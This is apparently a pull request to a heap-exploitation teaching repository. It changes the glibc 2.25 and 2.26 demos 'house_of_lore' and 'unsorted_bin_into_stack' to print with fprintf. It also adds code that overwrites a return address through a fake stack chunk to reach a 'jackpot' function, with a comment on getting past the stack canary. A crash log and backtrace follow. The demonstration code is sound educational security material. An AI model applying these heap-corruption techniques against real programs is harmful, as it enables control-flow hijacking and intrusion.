### PR TITLE
change puts to fprintf

### DIFF
--- a/glibc_2.25/house_of_lore.c
+++ b/glibc_2.25/house_of_lore.c
@@ -26,7 +26,7 @@ else
 #include <string.h>
 #include <stdint.h>
 
-void jackpot(){ puts("Nice jump d00d"); exit(0); }
+void jackpot(){ fprintf(stderr, "Nice jump d00d\n"); exit(0); }
 
 int main(int argc, char * argv[]){
 

--- a/glibc_2.25/unsorted_bin_into_stack.c
+++ b/glibc_2.25/unsorted_bin_into_stack.c
@@ -1,6 +1,9 @@
 #include <stdio.h>
 #include <stdlib.h>
 #include <stdint.h>
+#include <string.h>
+
+void jackpot(){ fprintf(stderr, "Nice jump d00d\n"); exit(0); }
 
 int main() {
   intptr_t stack_buffer[4] = {0};
@@ -27,5 +30,9 @@ int main() {
   //------------------------------------
 
   fprintf(stderr, "Now next malloc will return the region of our fake chunk: %p\n", &stack_buffer[2]);
-  fprintf(stderr, "malloc(0x100): %p\n", malloc(0x100));
+  char *p2 = malloc(0x100);
+  fprintf(stderr, "malloc(0x100): %p\n", p2);
+
+  intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode
+  memcpy((p2+40), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary
 }

--- a/glibc_2.26/house_of_lore.c
+++ b/glibc_2.26/house_of_lore.c
@@ -26,7 +26,7 @@ else
 #include <string.h>
 #include <stdint.h>
 
-void jackpot(){ puts("Nice jump d00d"); exit(0); }
+void jackpot(){ fprintf(stderr, "Nice jump d00d\n"); exit(0); }
 
 int main(int argc, char * argv[]){
 

--- a/glibc_2.26/unsorted_bin_into_stack.c
+++ b/glibc_2.26/unsorted_bin_into_stack.c
@@ -1,6 +1,9 @@
 #include <stdio.h>
 #include <stdlib.h>
 #include <stdint.h>
+#include <string.h>
+
+void jackpot(){ fprintf(stderr, "Nice jump d00d\n"); exit(0); }
 
 int main() {
   intptr_t stack_buffer[4] = {0};
@@ -29,5 +32,9 @@ int main() {
   //------------------------------------
 
   fprintf(stderr, "Now next malloc will return the region of our fake chunk: %p\n", &stack_buffer[2]);
-  fprintf(stderr, "malloc(0x100): %p\n", malloc(0x100));
+  char *p2 = malloc(0x100);
+  fprintf(stderr, "malloc(0x100): %p\n", p2);
+
+  intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode
+  memcpy((p2+40), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary
 }


### PR DESCRIPTION
Hi, I tried to add the same function jackpot() in house-of-lore into unsorted-stack-into-stack since I found the two techniques are similar. But triggered an error.

```
This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.
Allocating the victim chunk
Allocating another chunk to avoid consolidating the top chunk with the small one during the free()
Freeing the chunk 0x152a010, it will be inserted in the unsorted bin
Create a fake chunk on the stackSet size for next allocation and the bk pointer to any writable addressNow emulating a vulnerability that can overwrite the victim->size and victim->bk pointer
Size should be different from the next request size to return fake_chunk and need to pass the check 2*SIZE_SZ (> 16 on x64) && < av->system_mem
Now next malloc will return the region of our fake chunk: 0x7ffe16ae6b40
malloc(0x100): 0x7ffe16ae6b40
*** Error in `./a.out': malloc(): memory corruption: 0x00007ffe16ae6b40 ***
Segmentation fault (core dumped)

[#0] 0x7ffff7805ccb → cmp BYTE PTR [rax], 0x48
[#1] 0x7ffff7807668 → _Unwind_Backtrace()
[#2] 0x7ffff7b22b4f → __GI___backtrace(array=0x7fffffffd058, size=0x40)
[#3] 0x7ffff7a2c9f5 → backtrace_and_maps(do_abort=<optimized out>, written=<optimized out>, fd=0x3)
[#4] 0x7ffff7a847e5 → __libc_message(do_abort=0x2, fmt=0x7ffff7b9ded8 "*** Error in `%s': %s: 0x%s ***\n")
[#5] 0x7ffff7a8f13e → malloc_printerr(ar_ptr=0x7ffff7dd1b20 <main_arena>, ptr=0x7fffffffdb10, str=0x7ffff7b9ad3f "malloc(): memory corruption", action=<optimized out>)
[#6] 0x7ffff7a8f13e → _int_malloc(av=0x7ffff7dd1b20 <main_arena>, bytes=0x400)
[#7] 0x7ffff7a91184 → __GI___libc_malloc(bytes=0x400)
[#8] 0x7ffff7a7a1d5 → __GI__IO_file_doallocate(fp=0x7ffff7dd2620 <_IO_2_1_stdout_>)
[#9] 0x7ffff7a88594 → __GI__IO_doallocbuf(fp=0x7ffff7dd2620 <_IO_2_1_stdout_>)
```

I think the error is from malloc() in the initialization process of puts(), so I recommend using fpintf() instead.